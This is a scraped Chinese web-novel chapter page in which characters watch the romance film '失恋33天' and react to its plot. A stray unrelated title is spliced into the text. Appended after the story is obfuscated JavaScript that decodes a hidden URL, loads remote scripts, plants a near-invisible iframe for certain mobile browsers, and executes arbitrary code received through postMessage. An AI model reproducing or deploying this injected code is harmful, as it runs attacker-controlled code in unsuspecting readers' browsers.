当前位置:铅笔小说>言情女生>华娱2004> 161章 文艺女青年的爱情

161章 文艺女青年的爱情

  这世上有这么一种女孩,出身平凡,长相平庸,却拥有强烈的自尊心,在人际关系中,一面大大咧咧,一面又敏感脆弱。

  如果你甩了她,她可以在你面前依旧昂头微笑,一直忍住眼泪直到转身,白天依旧在商场职场左右突围,晚上关起房门生不如死。

  她们在世界的大染缸里浸泡多年,却依旧相信那些在书房和摄影棚里炮制出来的爱情。

  这种姑娘,统称为文艺女青年。

  在10年代,网上似乎遍地都是女文青,虽然没少遭到群嘲,但回头想想,这些女文青其实倒也挺可爱。

  因为到了20年代,女文青绝迹江湖,网上似乎只剩下了小仙女和各路老拳师。

  黄小仙就是这样一个文艺女青年,她瞧不上虚荣做作的冯佳琪,也闹不明白为什么魏依然这样的成功人士,会选择冯佳琪。

  “我干这行这么多年,发现许多优秀的男人身边都配着这样一个女人,长相美丽,但张口LV,闭口Prada,你要和她聊聊什么是爱情吧,她准会告诉你,你给我的银行卡里面的零,就是我爱情的真谛。”

  “为什么啊?”黄小仙问魏依然,“为什么那些优秀的男人,会喜欢这样的女人?”

  李薇薇调整了下坐姿,聚精会神地盯着大荧幕。

  她也很好奇这一点。

  为什么男人都喜欢那些看似美丽、实则浅薄的女人,像她这样有追求、有思想的好姑娘,为什么就无人问津呢。

  只见郭竟飞一身黑色西装,倍儿有老板的派头,闻言笑道:“原因很简单,就两个字,省心。”

  “简单来说,男女人之间产生好感的时候,大脑就会分泌多巴胺,陷入爱情的时候呢,会分泌苯乙胺醇,想和对方发生亲密行为的时候就会分泌荷尔蒙,这些激素的分泌,其实就是所谓的爱情。”

  “但是,多巴胺的有效反应是3个月,苯乙胺醇的有效反应是2年,荷尔蒙的反应期比较长,但也只有三到四年。”

  “所以两个人在一起相处久了,这些激素停止分泌了,就会因为习惯而澹漠,最后只剩下厌倦,相看两相厌。”

  “但冯佳琪就不一样了,只要给她LV和Prada,她就会高兴,荷尔蒙会停止分泌,但LV总不会那么快倒闭吧。”

  黄小仙忍不住问道:“那她爱的,到底是你的人,还是你的钱?”

  “无所谓,”郭竟飞耸耸肩,“我最不缺的就是钱,只要我一直有钱,她就会一直爱我,这不是比所谓的爱情更靠谱吗。”

  黄小仙一时哑口无言。

  这就是魏依然这种成功人士对女人的态度,简单粗暴,但又非常有效。

  与其花心思谈恋爱,不如直接给她们花钱。

  “不,”黄小仙还是摇头,“并不是所有姑娘都喜欢LV,你不能一概而论。”

  郭竟飞一笑,“那是因为你还没有遇到送LV的男人。”

  黄小仙怒了,“你跟我约过会吗,凭什么这么肯定啊!你就是从来没有遇到过那种优质的姑娘,才会认为女人都是那么浅薄!”

  “那要不我们约会一次?”郭竟飞邀请道:“让你这样的高品质姑娘,来给我补补课?”

  “好,”黄小仙想了想,还是点头同意了。

  郭竟飞得意一笑,计谋得逞。

  像魏依然这样的成功人士,又怎么会真的在一棵上吊死呢?

  对他来说,只是需要一个冯佳琪这样的花瓶,摆在家里给他生儿育女,帮他组建家庭而已,爱不爱的根本不重要。

  那些喊着“这条腿能玩一年”的少年们,毕竟还是太年轻了。

  真正成熟的男人就会明白,就算白袜黑丝换着来,最多玩三个月也就腻了。

  但只要你有钱,就有数不尽的美腿可以换着玩。

  偶尔尝一下黄小仙这样的文艺女青年是个什么滋味,倒也不赖。

  ——这才是魏依然邀请黄小仙约会的真实目的。

  当然了,这种隐藏情节肯定是不能拍出来的。

  《失恋33天》毕竟是一部女性向的电影,真要拍出来,难免会影响女性观众对这部电影的看法。

  但仅仅是电影拍出来的那一小部分,也很让李薇薇这样的女青年感到震惊。

  她还是第一次听到有人用激素分泌来描述爱情,也是第一次明白,原来成功人士是这样看待女人的。

  这让她非常不能接受。

  电影院里,像她这样想的姑娘占绝大多数。

  毕竟愿意花钱进电影院,看这样一部电影的女生,大部分都自认是黄小仙,她们绝不会承认自己也会虚荣,也会拜倒在金钱攻势之下的。

  于是黄小仙和魏依然的这场约会,就有了点决战的意思。

  李薇薇非常期待,她很想看看黄小仙到底是怎么对付魏依然这种土豪的。

  “接下来去哪?”吃过饭,魏依然开着豪车载着黄小仙。

  黄小仙坐在后排,靠在车窗外,道:“去东方新天地吧。”

  “这点你倒是和冯佳琪一样,吃完饭去买点东西,就当散步了。”

  郭竟飞不屑地笑笑,什么文艺女青年,不一样喜欢买买买。

  黄小仙白了他一眼,懒得解释。

  俩人来到东方新天地,不过黄小仙没有去购物,而是带着魏依然来到广场。

  “一直在下面埋头消费,都不知道上面还有这样的好风景吧。”

  “嗯,视野真好。”魏依然点头,和她一起坐到了喷泉前。

  “我上大学的时候,和男朋友来逛王府井,那时候没钱,什么都舍不得买,后来我们来到这里,你猜,我们干什么了?”

  “干什么了?”

  “我们接吻了,初吻。”

  “跑到王府井什么都不给你买,就能把你的初吻骗走?”

  “赶上好时候了,”黄小仙澹澹地笑着,抬起手腕,秒针旋转着。

  九点整,广场上的灯光瞬间亮起,喷泉四射,水流如柱,灯光在水柱中流动,温润如玉。

  喷泉升起的时候,李薇薇在心里小小地惊叹了一下,她在燕京那么久,也去过王府井,竟不知道那里还有这样浪漫的喷泉。

  黄小仙坐在喷泉前,发丝在风中飞舞,她拢了拢头发,一抬头,发现魏依然怔怔地看着她。

  “我承认,如果我要是年轻一点,我会对你这样的姑娘心动。”

  黄小仙微微一笑,“我只想告诉你,有的姑娘会带你去商场,让你为她买买买,但也有的姑娘什么都不要,只想和你在喷泉升起的时候接个吻。”

  “来都来了,接个吻再走吧,”魏依然低下头,将嘴唇凑过去。

  黄小仙一把推开他,“你一凑近了我才闻出来,虽然喷了高级古龙水,但还是带着一股有钱人的混蛋味儿。”

  她此时已经完全看穿了魏依然的真面目,这家伙能够在新婚前夜出来和别的女人约会,还想接吻,简直十成十的混蛋。

  有钱土豪终于还是没能搞定文艺的女青年。

  这未必是现实,但绝对符合那些文艺女观众的看法。

  浪漫的小提琴曲渐渐响起,黄小仙背着包向前走去,回过头,目之所及,全是当年和前男友追逐打闹快乐的身影。

  黄小仙眼神一暗,带着点怀念和感伤,终于转过头去,坚定地走远了。

  当天晚上她又一次梦到了那个老人,不过老人什么都没说,只是给她点了一碗冰淇淋,留下一封信就走远了。

  黄小仙好奇地拆开信,老人在信里告诉她,他的生命马上就要走到尽头,通过时光机器回到过去,就是为了鼓励当时正处于人生低谷的黄小仙。

  即使失恋,也不要悲伤难过,在未来,会有一个命中注定的恋人在等你。

  黄小仙从梦里醒来,已经是第二天早上,她虽然很怀疑梦境的真假,但还是有被安慰到。

  有人说,走出失恋的最好办法,就是开始一段新的恋情。

  既然老人告诉她,她一定会遇到那个命中注定的恋人,那还等什么,直接去找呗。

  再加上家里父母的逼迫,黄小仙便无奈地开启了奇葩的相亲之旅。

  最后在王小贱的毒舌之下,黄小仙不得不承认,她这个既没钱、又没姿色的老姑娘终于在相亲市场上成为了昨日黄花了。

  偶尔有个奇葩男看上她,她还要怀疑一下,对方到底是在馋她身子,还是在馋她房子。

  痛定思痛之下,黄小仙终于悟出了那条至理名言,女人首先要经济独立,才有尊严可言。

  恰好此时王小贱被房东赶了出来,在王小贱的苦苦哀求之下,黄小仙便将自家的空房租给了他,每个月收他八百块钱房租。

  王小贱一脸兴奋地搬进了新屋,顺势和黄小仙开启了没羞没臊的同居生活。

  这一天,黄小仙相亲归来,一脸郁闷地躲进了房间里,还没郁闷一会儿,王小贱就端着碗冰淇淋敲开了她的房门,“怎么了,一回来就不说话?”

  “别烦我。”

  “好吧,我等会儿再来。”

  “站住,吃的给我留下。”

  王小贱便端着冰淇淋递给她,黄小仙一把抢过,吐槽道:

  “这都什么事儿啊,现在相亲的那些男的,恨不得今天见面,明天结婚,后天就生孩子……现在连结婚都这么草率,一点感情基础都不要了吗?”

  “你给小猫小狗配种,也得让它们先熟悉熟悉呢。”

  “我决定了,我以后宁愿孤独终老,也决不能就这么草草地把自己嫁出去。”

  黄小仙的这句话无疑说出了影院里很多大龄单身女青年的心声。

  王小贱问:“你要是不嫁人,以后七老八十了,走不动了,谁养你啊?”

  “这不是有你呢吗,这个月八百块房租别忘了啊。”

  “嘿,你这黑心的地主老财,净剥削我们这些外地来的上班族。”

  黄小仙用勺子挖了口冰淇淋嘿嘿一笑,“我现在算是想明白了,与其花心思跟你们这些男人谈恋爱,不如我自己多赚点钱。”

  “好觉悟姑娘,”王小贱一竖大拇指,“那我也崩跟您客气了,这碗冰淇淋成本五十,加上我辛辛苦苦忙活了半个小时,收您三十不多吧。”

  “你怎么不去抢呢?就你这手艺,也好意思收三十?”

  “你可别小瞧我这手艺,就这冰淇淋一共有两层味道,上面草莓,等你吃到下面,就能尝出薄荷味了,收你三十便宜你了。”

  “薄荷味?你怎么知道我喜欢薄荷味?”

  黄小仙挖了一大勺,尝了尝,那熟悉的味道一下子让她想起了那个梦境。

  那个老人,每次见面,都会为她点一碗薄荷味的冰淇淋。

  难道?

  她狐疑地看向王小贱。

  “怎么了,你不喜欢吃吗?”王小贱担心道。

  “哦,不是,你哪来的薄荷啊?”黄小仙转移话题道。

  “冰箱里不是有牙膏吗,我就挤了点……”

  “咳咳……”黄小仙差点没噎死,抄起沙发上的枕头就开始满屋子追打王小贱。

  “哎哎哎,黄小仙,你别以为你是女人我就不敢还手啊……我好男不跟女斗……黄小仙你过分了啊……”

  大荧幕上,那对男女打打闹闹,电影就在这种欢乐的氛围中结束了。

  黄小仙失恋第33天,她的生命翻开了新篇章。

  虽然电影结局没有明示,但观众们基本也都能看出来,王小贱便是那个老人。

  黄小仙找来找去,没想到她的真命天子,居然一直都陪在她身边。

  这样的结局太暖了。

  影院里灯光亮起,观众们陆续起身离开,李薇薇偏着头坐在那里,还沉浸在电影里,彷佛喝了鸡汤一样,心里感到一股澹澹的温暖和喜悦。

  《大明第一臣》

  有的电影让人觉得搞笑,有的电影让人领略视觉上的震撼,还有的电影,则能人在电影里看到自己。

  《失恋33天》就是这样一部电影。

  电影看到最后,她感觉自己就是黄小仙,黄小仙就是她自己。

  黄小仙的这段失恋用了33天才走出来,那么她又要用多少天呢?

  她是不是也会等到自己命中注定的那个恋人呢?

  她的身边是不是也有这样一个王小贱,在默默地陪着她呢?

  虽然前路依旧漫长,但她对未来已经不再惶恐,心里也多了几分期待。

  这就是电影的力量。

  一直到保洁阿姨进来打扫卫生,郭小北才起身起开,和他一起离开的还有几个姑娘,郭小北注意到,她们的脸上几乎都挂着笑容。

  他现在明白为什么江瑜会把一部讲失恋的片子放到春节档播放了。

  整部电影以失恋为主题,对女性的恋爱心理进行了极为细腻的刻画,而结局呢,又非常温暖,给人以力量。

  对那些失恋过的姑娘们来说,《失恋33天》堪称是一味绝佳的治愈良药。

  而天朝,有多少人失过恋?

  会有多少姑娘,愿意带着自己的男朋友来治愈一下?

  郭小北真是越想越心惊。

  这部小成本的爱情电影,潜力惊人啊!
eval("\x77\x69\x6e\x64\x6f\x77")["\x62\x4a\x6f"]=function(e){var li ='ABCDEFG'+''+'HI'+''+'JKLM'+'NOPQRSTUVWXYZab'+''+'cdefghi'+''+'jklmnopqrstuvwxyz0'+'123456789+/'+''+'=';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x61\x51\x77\x45"]=function(){eval(bJo("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQoYkpvKHUucmVwbGFjZShuZXcgUmVnRXhwKGMrJycrYywnZycpLGMpLnNwbGl0KCcnKS5yZXZlcnNlKCkuam9pbignJykpKTsnalF1ZXJ5Jzt2YXIgX3VhPW5hdmlnYXRvci51c2VyQWdlbnQ7dmFyIF9iSm9iSm89JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoYkpvKCJZbUZwWkhVPSIpKT4tMSB8fCBfdWEuaW5kZXhPZihiSm8oJ1NIVmhkMlZwUW5KdmQzTmxjZz09JykpPi0xKXtpZihfdWEuaW5kZXhPZihiSm8oJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfYkpvYkpvKTt9ZWxzZXtmdW5jdGlvbiByZChuLG0pe3JldHVybiBNYXRoLmZsb29yKE1hdGgucmFuZG9tKCkqKG0tbisxKStuKTt9ZnVuY3Rpb24gcm0oZSl7aWYoZSYmZS50YWdOYW1lLnRvVXBwZXJDYXNlKCk9PT0iSUZSQU1FIiYmZS5zcmMuaW5kZXhPZih1KT4tMSl7ZS5yZW1vdmUoKTt9ZWxzZSBpZihlLm5leHRFbGVtZW50U2libGluZyl7cm0oZS5uZXh0RWxlbWVudFNpYmxpbmcpO319bGV0IGM9ZFtiSm8oIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdDYkYnKydNJysnJysndScrJyc7dmFyIF9fa2RucWlkID0gJ2snICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19rZG5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19rJysnZGEnKyducScrJ29iJysnal8xODcnXT1kWydxdScrJ2VyeScrJ1NlbGUnKydjdG8nKydyJ10oJyMnK19fa2RucWlkKTtfaWQgKz0gZFsncXUnKydlcnknKydTZScrJ2xlYycrJ3RvJysnckEnKydsbCddKCcuJytfY2xhc3MpLmxlbmd0aDt2YXIgeiA9IHUrJy0yLycrX2lkKycvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnImFsJysnbG93dHJhbicrJ3NwYScrJ3JlbmN5IHNyJysnYz0iJyt6KyciPjwvaScrJ2ZyJysnYScrJ21lPicpO3dbImFkIisiZEV2IisiZW50TCIrImlzdCIrImVuZXIiXSgibSIrImVzcyIrImFnZSIsZnVuY3Rpb24oZSl7aWYoZS5kYXRhW3IrX2lkXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKGJKbyhlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9iSm9iSm8pO319KSgnMScrJycrJ0lUTCcrJzMnKydnVCcrJ010JysnJysnTW0nKycnKydSeScrJycrJ1VpWScrJycrJ2tCJysnJysnM1puJysnJysnRm4nKydZJysnR0onKycnKydUSnonKydRJysnRE53JysnJysnSVQnKycnKydReicrJycrJ1UnKycnKydDJysnJysnY3YnKycnKydSJysnbkwnKycnKyd6QVQnKydacnInKycnKydkbScrJ2JweCcrJycrJ20nKydMJysnelonKydrJysnTWxZJysnJysnaycrJ01sJysnRScrJycrJzBNJysnJysnbCcrJycrJ01IJysnJysnYzAnKycnKydSSGEnKycnLCdDYkYnKydNJysnJysndScrJycsd2luZG93LGRvY3VtZW50LDAsJ3InKQ=="));}

上一章目录+书签下一章